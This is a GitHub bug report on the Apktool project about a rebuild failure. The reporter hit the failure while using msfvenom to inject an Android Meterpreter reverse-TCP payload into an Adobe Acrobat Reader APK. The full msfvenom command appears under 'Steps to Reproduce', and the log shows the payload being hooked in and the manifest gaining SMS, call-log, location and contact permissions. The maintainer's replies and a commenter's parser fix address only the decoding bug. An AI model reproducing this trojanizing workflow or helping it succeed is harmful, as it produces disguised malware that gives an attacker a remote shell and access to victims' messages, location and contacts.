search

iBotPeaches / Apktool

A tool for reverse engineering Android apk files
https://apktool.org/
Apache License 2.0
19.84k stars 3.56k forks source link

[BUG]brut.common.BrutException: could not exec #3183

Open TheBigBossYoyo opened 1 year ago

TheBigBossYoyo commented 1 year ago

Information

  1. Apktool Version (apktool -version) -2.7.0
  2. Operating System (Mac, Linux, Windows) -Kali Linux
  3. APK From? (Playstore, ROM, Other) -Apkcombo
  4. Java Version (java --version) -java --version openjdk 17.0.6 2023-01-17 OpenJDK Runtime Environment (build 17.0.6+10-Debian-1) OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)

Stacktrace/Logcat

Using APK template: Adobe Acrobat Reader_23.7.0.28525.Beta_apkcombo.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.adobe.reader.sixpa
[*] Loading /tmp/d20230720-145046-ntqmfq/original/smali_classes2/com/adobe/reader/ARProdApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230720-145046-ntqmfq/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether resources has changed...
I: Building resources...
W: invalid resource directory name: /tmp/d20230720-145046-ntqmfq/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_182227548664954999358334969126464036409.tmp, p, --forced-package-id, 127, --min-sdk-version, 24, --target-sdk-version, 33, --version-code, 1928328525, --version-name, 23.7.0.28525.Beta, --no-version-vectors, -F, /tmp/APKTOOL17400763258487642668.tmp, -e, /tmp/APKTOOL12902561713408612721.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20230720-145046-ntqmfq/original/res, -M, /tmp/d20230720-145046-ntqmfq/original/AndroidManifest.xml]
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20230720-145046-ntqmfq/original/AndroidManifest.xml:1056: error: '@2114191360' is incompatible with attribute resource (attr) reference.
W: error: failed processing manifest.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_93107876177108327297519278226192524222.tmp, link, -o, /tmp/APKTOOL9392890766304539922.tmp, --package-id, 127, --min-sdk-version, 24, --target-sdk-version, 33, --version-code, 1928328525, --version-name, 23.7.0.28525.Beta, --no-auto-version, --no-version-vectors, --no-version-transitions, --no-resource-deduping, --allow-reserved-package-id, -e, /tmp/APKTOOL1809429853351183989.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, --manifest, /tmp/d20230720-145046-ntqmfq/original/AndroidManifest.xml, /tmp/d20230720-145046-ntqmfq/original/build/resources.zip]
Error: Unable to rebuild apk with apktool

Steps to Reproduce

  1. msfvenom -x Adobe\ Acrobat\ Reader_23.7.0.28525.Beta_apkcombo.com.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.136 LPORT=4444 -o Adobe-acrobat.apk

Frameworks

If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files (.apks that live in /system/framework or /system/priv-app)

APK

If this APK can be freely shared, please upload/attach a link to it. https://apkcombo.com/fr/adobe-acrobat-reader/com.adobe.reader/download/apk

Questions to ask before submission

  1. Have you tried apktool d, apktool b without changing anything? No
  2. If you are trying to install a modified apk, did you resign it?Yes
  3. Are you using the latest apktool version?Yes
iBotPeaches commented 1 year ago

This might be related to https://github.com/iBotPeaches/Apktool/issues/2514, but I am also learning with my recent investigations that we might need to introduce an unknown type of resource.

What is happening there is we can't find that resource in your example (0x7E040000) thus its getting serialized as the decimal value (2114191360) and dropped into the manifest.

So the questions here are.

TheBigBossYoyo commented 1 year ago

So what can I do to resolve ?

iBotPeaches commented 1 year ago

So what can I do to resolve ?

I'm lost - doesn't my reply answer what we need to research/do in order to resolve? I'm not sure how I can reword that.

TheBigBossYoyo commented 1 year ago

Oh ok sorry

TheBigBossYoyo commented 1 year ago

When you find a solution feel free to ping me

cpereirarafa commented 1 year ago

I have faced the same problem with apktool 2.8.1 on binance apk (https://www.binance.com/en/download), the same way as #3303

From what I have searched, actually the attrs.xml holds an entry for the id, but the name of the attr comes also as an id. I am not sure that its an error on decompilation because investigating with jadx the same happens in attrs.xml.

Back to apktool, in brut.apktool/apktool.lib/src/main/java/brut/androidlib/res/decoder/AXmlResourceParser.java - line 365 it verifies first if we have a non-null resourceMapValue, otherwise goes to stringBlockValue. I bypassed the error by checking if the resourceMaValue starts with a number, to use the stringBlockValue in this case too.

if (resourceMapValue != null && !resourceMapValue.matches("^([0-9])+"))